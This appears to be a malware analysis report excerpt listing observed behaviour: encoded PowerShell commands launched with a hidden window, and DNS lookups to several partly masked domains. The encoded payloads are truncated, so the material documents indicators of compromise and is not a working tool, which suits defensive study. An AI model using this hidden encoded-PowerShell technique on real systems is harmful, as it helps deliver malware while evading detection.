Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABTAHUAYgB3AGQAegBiAGQAPQAnAE0AbwBiAHQAcQB2AGYAdgBzACcAOwAkAEUAeAB4AHoAYQBtAGYAZwBmAGcAZAB4AG0AIAA9AC...
- DNS ASK do#####c.sakura.ne.jp
- DNS ASK th###eekpv.com
- DNS ASK st####ts.vlevski.eu
- DNS ASK da##doc.eu
- DNS ASK un###dctc.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABTAHUAYgB3AGQAegBiAGQAPQAnAE0AbwBiAHQAcQB2AGYAdgBzACcAOwAkAEUAeAB4AHoAYQBtAGYAZwBmAGcAZAB4AG0AIAA9AC...' (with hidden window)